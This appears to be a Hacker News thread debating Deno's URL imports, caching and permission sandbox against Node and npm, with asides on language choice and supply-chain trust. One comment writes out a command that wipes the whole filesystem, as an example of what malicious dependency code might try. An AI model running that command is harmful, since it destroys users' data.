I was just racking my memory and searching through my library of interesting links to find exactly this! Paul Chiusano gave a nice introductory talk at strangeloop last year: https://www.youtube.com/watch?v=gCWtkvDQ2ZI

Interesting, yeah that sounds like what I was thinking about. Thanks for the link.

Rich Hickey's talk about this is enlightening https://www.youtube.com/watch?v=oyLBGkS5ICk

You still need to keep track of things that are mutually incompatible.

Not really, because you ship every required version of every function. Functions aren’t incompatible with functions they don’t use.

The node_modules folder with its tenths of thousands of files is killing my ssd!

as it is present in every node project I have, and consumes a gigantic number of io operations.

Thus I’m very glad that deno didn’t continue this tradition.

Replace ‘node_modules’ with ‘deno cache’ and presto! you’re in the future.

Yarn already removes the need for node_modules without requiring to change interpreter and APIs, though.

Not true

deno cache contains only the js files, and each one of them includes all its dependancies in the same file.

OTOH node modules contains every package in the dependency tree, and each package has many files not related to the required js file.

You might as well live without GUI as those involve "gigantic" amount of IO as well.

Why are people being so sensitive with hardware resource? Like how Electron is killing your machine...

ssd has limited number of write operations, while node_modules writes many many files to the disk.

And as mentioned in the article you repeatedly remove and recreate it to fix “problems”

Even with write amplification a node_modules is not typically going to cause more than a few gigabytes write load. So with max TBW being somewhere in the hundreds of terabytes for current SSD, we're looking at hundreds of thousand node_module rewrites before the drive gives.

Unless you're rewriting your node_modules every other minute on an old SSD I recommend finding something else to worry about.

All these "features" of Deno are super cool, but why reimplement a runtime from scratch :(

Can we not benefit in Node from what I essentially see as "package.json not mandatory" - which I think is already achievable with ES Modules - and "better permissions model"?

Maybe this can be seen as the effort from several years ago where a project "io.js" branched out of Node as trying to implement certain things the community didn't like. Then after a few years they were implemented into Node and io.js "died off". Although io.js had always the intent of being compatible with Node, so that definitely changes things.

Some of what Deno does can be done in Node or people are trying to implement it (I've seen some proofs of concept around the way modules are included). However, it seems that being able to write the runtime in Rust has been a big deal here as it dramatically changes how the runtime is distributed and the developer experience of writing extensions for it versus Node.

How is choosing between Rust and C++ as the language in which the thing is written in, an important thing to the users who only care about the JS/TS interface?

Because, in the long run, rust is a much better language for writing this in, and will enable faster addition of features for the JS/TS interface and more certainty that the security level stuff is actually secure.

The npm registry is like a rickety bridge across a chasm. Every day I cross that bridge because of how much time and work it saves me, but I am well aware that the bridge might fall, especially with Microsoft now in charge.

Claiming that I don't need a bridge does not help me. Claiming that Deno is agnostic about bridges is fine. If someone is looking for a startup idea, here is a perfect opportunity to build a better bridge - one that works with Deno.

Seems odd that they don't support an equivalent of the integrity attribute.

For example https://deno.land/x/ is effectively nothing but a URL redirect server, where it rewrites URLs to include a git commit-ish reference in the redirected URL. So https://deno.land/x/oak@v4.0.0/mod.ts becomes https://raw.githubusercontent.com/oakserver/oak/v4.0.0/mod.t..., which GitHub serves up a nice versioned module.

Thus http://deno.land/x/ is the de facto central registry. I'm yet to see how it makes a difference whether the logic of resolving a package name to a concrete version of the package is baked into command line tooling or a web service.

Feel like it would've been useful to require a manifest.json or some such that spec'd required permissions right next to the deno package on the FS, in the web server web root. This is not different from manifests for Web Extensions. Then anyone could write their own CLI to download and cache packages but have their own "excluded permissions" list that throws/rejects packages that overreach or could potentially overreach.

Now package writers have a feedback metric for getting as granular as possible with that access their package needs. Even better, anyone could build server infrastructure that does not the client-side validation bit for package consumers with their own attendant CLI tool.

It looks to me Deno opens the possibility of multiple NPMs, which is a good thing over the de facto monopoly NPM exerts today.

The issue I have with Deno is not only comparing to NodeJS. If you might use Deno it means you are open to switching platform and even language of you were not going TS already. And if you are at this point, you might as well choose any plateforms, for example one that use a better (with stronger types) programming language and a bigger ecosystem (scala, swift, rust, F#, java, ocaml, kotlin... At this point I feel nearly any other languages fit this description ^^). I have been doing Typescript for a while now, it's probably as good as it could be doing what it does (being a JS add on), but if you don't have this constraint, there are many better options.


scala could be so different that you can spent years learning it and still don't understand a lot of things. Swift is ok, but ARC is a nightmare. Good for mobile though. Rust is really for C++ guys for specific use cases. F#/Ocaml is cool languages, but good luck hiring fast if you need to. Kotlin probably best, but in fact it works with decent performance only on JVM. Native is still 15x times slower than JS.

TS is a first class language and have bigger ecosystem anyway than, say, F#. etc etc

I'd like to add that the ecosystem around TS/JS is huge, even allowing you to do interop with both F# and Ocaml on both frontend and backend code.

I’m going to skip over the other stuff, but

> Native is still 15x times slower than JS.

Surely you meant the other way around?


Seems Kotlin native can be 100x slower than its JVM version. It's still under development so this can of course change.

Frankly no, we tried to to everything in kotlin and it was insane how slow it is comparing to JS. You literally parse 1kb JSON for 100ms+.

Kotlin JS is not fast either since it is not that optimal for browsers and have all runtime checks for types so just doing something like: a * b + c will yield three typeof invocations.

You can use normal js with deno. And most npm modules can work through jswm or pika.dev.

This may be inviting downvotes, but I still don't understand the use-case of Deno. Why would I use this over something like Python?

In Python, I find I can do most things I want with the standard library plus a handful of well-known packages, so even just downloading the tarballs and installing manually isn't all that onerous.

Why do I want a "browser for code"?

I may just be out-of-touch, as a purely backend/machine-learning/quality engineer. Clearly, this is a real need in the front-end / JavaScript space, but coming from the outside I just don't quite understand yet the value proposition here. Can anyone explain?

>Why would I use this over something like Python?

That's more a js vs python question than a Deno question so I don't think you'll find many answers here as we'd veer off-topic.

>I find I can do most things I want with the standard library

A standard library exists for Deno as well. Code from any URL is not an argument against having a standard library. The distinction being made is whether or not package management should be brittle and baked into the programming model to accept only one source of truth vs. any. Any source of truth has the advantage of letting better solutions evolve and reveal themselves over time, which is great for longevity, standards, etc. etc.

> Why do I want a "browser for code"?

My understanding is that this a lot to do with reproducing how front-end code behave "in the wild." If you have a full browser, you aren't tricking your programming model into thinking it's being run in a browser. I think this has tooling advantages in the short term (i.e. simplicity) and more subtle ones in the long term.

Thanks. My question really wasn't focused well, and it was easily read not as "please help me understand" but as "hurr durr Python is better".

I think my reaction comes from the dissonance between people saying "Deno is the best thing ever for CLI apps!" then following up with "Here are the ways it's better than Node!", without acknowledging all the other scripting languages out there. But I think I need to read that first line as having an implicit "...in the JS/TS ecosystem", and then it all makes sense.

Since clearly one of Deno's draws is that it improves on the package management of Node, I was wondering why JS projects so often end up with such a long list of dependencies, compared to the Python/Go/C++ projects that I'm more familiar with. That's probably explained just by NPM making it easy, so people did it. (Sort of like how Java grew convoluted DI schemes because OO + GC + reflection made it possible.)

One of these days I should learn more JS than having read through the Good Parts once. :-)

Your question really is "why use server-side JS over Python" and that doesn't have a real answer, just never-ending arguments.

Let's paint it blue!

> Clearly, this is a real need in the front-end / JavaScript space

I think you answered your own question there. If you already know JS/TS and want to dive into server code then this is more approachable than learning a brand new language.

if you have everything you need in python then you're not really the target audience. deno is an answer to the current state of the npm ecosystem. Not that you shouldn't switch to deno from python, but you should only do that if you already had a reason why you wanted to switch to node from python.

Can someone explain to me what problem that Deno and Node are trying to solve? Is JavaScript really such an amazing language that we need to use it for backend applications now?

What niche is it filling that is unfilled by other, more sanely designed programming languages?

I'm not trying to be obtuse or anything, I'm just really curious as to why anyone would use Deno (or Node for that matter) for a project when I can think of at least 4 alternatives that are more sane (Go, Python, Rust, Java, and many more out there, just that these are the ones I'm most comfortable with).

This seems like trolling more than a genuine question, but I'll answer in case it is genuine.

It makes it easier for fullstack developers since it's a single language both in the front-end and back-end. You only need to learn once how `JSON.parse()`, `atob`, classes/prototypes, etc. work, and not worry about language inconsistencies making errors.

It is decently efficient (not the best, not the worst), fairly readable (I'd say on the upper side). The three main disadvantages IMHO are:

- Its async nature is more difficult to grasp for beginners compared to one thread/request and then linear-ish work of some other languages

- Node.js standard library is optimizing for flexibility instead of conciseness or completeness, so there's quite a bit of manual gruntwork involved (not the worst of those mentioned though).

- Right now the ecosystem is in a major migration from `require()` to `import`. The last large migration like this was from Callbacks to Promises, and IMHO it went very well.

As someone who is very comfortable with Javascript, and was comfortable with PHP and Python back in the day, I would not trade Node.js for any of those. I am thinking most of the time about what I want to achieve in a coherent way, and not fumbling with pointers.

> - Its async nature is more difficult to grasp for beginners compared to one thread/request and then linear-ish work of some other languages

Grasping isn't the hard part, it's just about placing callback functions on executed functions that allows callbacks.

What's so bad is that it is async by default and now you need million "await" and "async" keywords all over the place. I wish it would be sync by default and for those rare cases where you really want it async, you would add a keyword.

I mean 4 of the very common Node.js operations are async by nature: database calls, file access, external API calls and crypto.

They aren't async by nature, just time consuming. Async is a useful way of dealing with time consuming operations in some situations, but blocking calls also a work (and make more sense for some workloads.)

Reasons for node:

* Testing/running code that will run on a browser javascript vm outside of the browser

* Developer familiarity

* Reduced context switching

* Reasonably good asynchronous performance given the above

* TypeScript, given the above

* Shared backend/frontend code(SSR, etc etc)

Interestingly I wouldn't really want to reach for any of your alternatives as a general substitute for NodeJS/TypeScript.. C# or F# perhaps.

> Can someone explain to me what problem that Deno and Node are trying to solve?

Deno and Node aren't solving the same exact same set of problems.

> Is JavaScript really such an amazing language that we need to use it for backend applications now?

Yes, for select values of “we”; productivity with programming languages being both subjective and path-dependent. But Node and Deno aren't so much about JS as a developer language as JS as a multi-language runtime, similar to the JVM. Just as one might use Scala, Kotlin, Clojure, Ruby, or other languages on the JVM, there are a large number of languages one can run on a JS engine.

> I'm not trying to be obtuse or anything, I'm just really curious as to why anyone would use Deno (or Node for that matter) for a project when I can think of at least 4 alternatives that are more sane (Go, Python, Rust, Java, and many more out there, just that these are the ones I'm most comfortable with).

Because your subjective idea of sanity isn't universal; and because there are substantial productivity advantages in sharing programming languages between front and back end, especially when you've got the same team doing both.

Node.js has been used in production for over a decade. Some of the most popular applications of the past decade have been built on Node and in 2020, JavaScript is the most popular programming language.

It's now the most popular programming language by a decent margin, there are a lot of libraries available for it, and it lacks some of the performance limitations that affect other dynamic languages. Anyone that does frontend dev knows JavaScript, its about as close to a universal language as you can get.

Personally theres about a dozen other things I'd rather use but from a pragmatic perspective it makes sense. It's easy and it gets the job done relatively quickly.

The engine V8 is developed for Chrome, so you can say it will be stable and actively developed for a very long while and there are plenty of resources online for the language itself.

And there's TypeScript if you think JS isn't "sane".

I still think that sandboxing dependencies is the wrong answer to this problem.

(first - the problem is trusting dependencies. How to spot malicious code in a dependency, and stop an evil upstream maintainer from doing bad things to your site)

This solution slows down the system at run-time (and also never quite solves the problem - sandboxes are pretty leaky. The history of browser extensions trying to do the same thing is a good example).

I'm not really sure what the solution is. I have some ideas, but they're mostly about changing the culture around coding, rather than technical.

Having sandbox restrictions available allows deeper defence. When it comes to running other people's code, VM restrictions provide a solid layer of protection.

At work we're transitioning our NPM scripts to run in containers. This is very cumbersome. But the extra layer protects dev homedirs from rando NPM authors.

Deno is awesome. We had a similar idea at Yazz Pilot and are currently building out the ability to import a subset of Javascript code from a URL. Currently it only supports code of the form:

pilot https://raw.githubusercontent.com/zubairq/pilot/master/start...

Interesting, so by making dependencies in the code itself, which is more obtuse than using node modules, we might see fewer overall packages being used by developers, and more implementations from scratch. No more gigabyte sized node modules! I'm looking forward to this.







There are many others. I don't know why people aren't looking into std (which provides most of the functionality) or using regex where it doesn't make sense given deno is a browser.

Well hopefully people find it too annoying to use deno modules and we get some sanity in development.

I’m still not sure how this addresses Laurie Voss’s point about left-pad. Does the caching and lock file happen by default?

> The Deno CLI works like a browser, but for code. You import a URL in the code and Deno will go and fetch that code and cache it locally, just like a browser. Also, like a browser, your code runs in a sandbox, which has zero trust of the code you are running, irrespective of the source.

Guessing it uses containerization or virtualization, hopefully with no gaps in security.

I don’t know that it uses either of those tools as the built-in approach. It could have changed, but last I read, it used V8’s built-in Isolate concept to provide the sandbox and that when an Isolate is created, it is only provided the underlying system access specified by CLI flags or other options e.g. Filesystem, Network, etc...

According to its architecture description ¹, there are no containers or virtualization involved in Deno.

I found deno::CoreIsolate in the source ². Userland process isolation seem to be provided by V8 Isolate.

The execution and security model remind me of recent trend in FaaS, in particular running WebWorkers (or similar), WASM, etc. Found a fascinating presentation about how V8 is used at CloudFlare ³.

"..using V8 isolates instead of containers or VMs, achieving 10x-100x faster cold starts and lower memory footprints.."


¹ https://deno.land/manual/contributing/architecture#schematic...

² https://github.com/denoland/deno/blob/2610ceac20bc644c0b58bd...

³ Fine-Grained Sandboxing with V8 Isolates - https://www.infoq.com/presentations/cloudflare-v8/

V8 is a sanbox by default, it does not expose any I/O functions. not even to the stadart output.


Deno runs js in v8 and all syscalls go through the rust runtime. The limitations are pretty coarse (but i'd say a great start).

It's running Javascript, not native code. You virtualize (and containerize, if you believe that's a meaningful security boundary) to handle execution of arbitrary native code --- or of runtimes, like Node.js, that proxy to arbitrary native code. The Deno runtime deliberately doesn't do this.

But couldn’t the code you download easily just execute `rm -rf / --no-preserve-root`? The problem isn’t executing code from a random URL (which NPM still has); it’s that even though there’s a sandbox, there’s still ways out of it.

Not in Deno. To run that, you’d need to shell out, which Deno won’t let you do without explicitly granted permission at the CLI.

You can in Node, because Node bridges the whole platform standard library by default. Deno does the opposite: you have to opt programs into the platform capabilities you want to give them.

Which you will nearly always give permission to do anything useful.

Others have noted Deno has good protections around this, but I would add that it has those because running a package from NPM is in and of itself just executing code from a random URL, and that has caused plenty of problems in the past.

Clear article, I honestly don't have much to add to the main thesis of it, other than that I'm very curious to see how well the arguments will hold up when faced with "real world" usage, and how Deno will evolve.

But if I may indulge in a bit of bike-shedding on the side, does anyone else think that the repeated URLs in the example dependency tree are a bit noisy and hide the deeper structure of the dependencies?

      ├── https://deno.land/std@0.53.0/fmt/colors.ts
      └─┬ https://deno.land/x/oak/mod.ts
        ├─┬ https://deno.land/x/oak/application.ts
        │ ├─┬ https://deno.land/x/oak/context.ts
        │ │ ├── https://deno.land/x/oak/cookies.ts
        │ │ ├─┬ https://deno.land/x/oak/httpError.ts
        │ │ │ └─┬ https://deno.land/x/oak/deps.ts
        │ │ │   ├── https://deno.land/std@0.53.0/hash/sha256.ts
        │ │ │   ├─┬ https://deno.land/std@0.53.0/http/server.ts
        │ │ │   │ ├── https://deno.land/std@0.53.0/encoding/utf8.ts
        │ │ │   │ ├─┬ https://deno.land/std@0.53.0/io/bufio.ts
        │ │ │   │ │ ├─┬ https://deno.land/std@0.53.0/io/util.ts
I'm not entirely sure what would be the ideal alternative presentation though. Perhaps something along the lines of one of these two mock-ups I just edited by hand:

       └─┬ x/oak/examples/server.ts
         ├── std@0.53.0/fmt/colors.ts
         └─┬ x/oak/mod.ts
           ├─┬ x/oak/application.ts
           │ ├─┬ x/oak/context.ts
           │ │ ├── x/oak/cookies.ts
           │ │ ├─┬ x/oak/httpError.ts
           │ │ │ └─┬ x/oak/deps.ts
           │ │ │   ├── std@0.53.0/hash/sha256.ts
           │ │ │   ├─┬ std@0.53.0/http/server.ts
           │ │ │   │ ├── std@0.53.0/encoding/utf8.ts
           │ │ │   │ ├─┬ std@0.53.0/io/bufio.ts
           │ │ │   │ │ ├─┬ std@0.53.0/io/util.ts

       ├── https://deno.land/std@0.53.0/fmt/colors.ts
       └── https://deno.land/x/oak/
             └─┬ mod.ts
               ├─┬ application.ts
               │ ├─┬ context.ts
               │ │ ├── cookies.ts
               │ │ ├─┬ httpError.ts
               │ │ │ └─┬ deps.ts
               │ │ │   ├── https://deno.land/std@0.53.0/
               │ │ │   │     ├── hash/sha256.ts
               │ │ │   │     └─┬ http/server.ts
               │ │ │   │       ├── encoding/utf8.ts
               │ │ │   │       ├─┬ io/bufio.ts
               │ │ │   │       │ ├─┬ io/util.ts
I'm sure there are good arguments to be made against both of these options as well - plus I just came up with this on the spot, I don't even know which "rules" would generate such a tree.

I think this is pretty good. I like the use of URLs as identifiers for your dependencies, just because it’s so unambiguous. I also like re-exporting deps manually.

My only real point of discomfort is how the runtime seems to be a bit too closely tied to the actual download and transport of these files/URLs. Like, importing from https implying all further imports are from https is nice, I guess, but is really stretching the browser metaphor imo.

I guess that is really my main point of contention, I agree with the security model but I don’t agree that websites are particularly analogous to code dependencies.

The post sounds rather Javascript-specific, or NPM-specific. How well does that apply to other languages? Especially compiled ones?

2 reasons why this could be a faulty approach:

1) Code, specifically library code, which is what npm mostly consists of, in its most ideal state should not have a never-ending variety. On the contrary, we do want to all arrive at one good way of doing a thing. This naturally invites a single central repository over the decentralization of the web.

2) Very few people publish their own websites. Why? It's complicated, costly. This is why Facebook and Twitter fair so well. So even the decentralized web eventually diverges onto a centralized platform that solves the hosting problem. Why reintroduce the problem when there is already a fairly un-problematic central registry?

If the security model is the real winner, I don't see why it could not be back-ported to Node - it likely will be if Deno takes off in any way.

I don't have an opinion on Deno per se, but I quibble with this part of your point:

> Code, specifically library code, which is what npm mostly consists of, in its most ideal state should not have a never-ending variety. On the contrary, we do want to all arrive at one good way of doing a thing.

This implies that there is in fact one good way to do most things, but in practice different people want different trade-offs and forcing them into a single codebase isn't possible when the options are mutually exclusive. You can't have a library that is simultaneously strict about types (panics if you pass a string instead of a number, say) and forgiving about types (automatically coerces strings to integers or vice versa).

Deno seems like the next mongo db fiasco waiting to happen. Insecure by default. The fact that it doesn't grant permissions by default is irrelevant, servers need permissions to function (access databases, access files, access the network, etc...).

The incentives are all wrong. If I MITM a website at best I gain access to the data of the few users that pass through my part of the net. If I MITM something Deno is using I get access to the server. That's orders of magnitude more data I get access too and therefore the incentive to MITM (or other) is much much MUCH higher.

I agree, they should force cached, sandboxed fetching by default and have people opt in to dynamic fetching.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact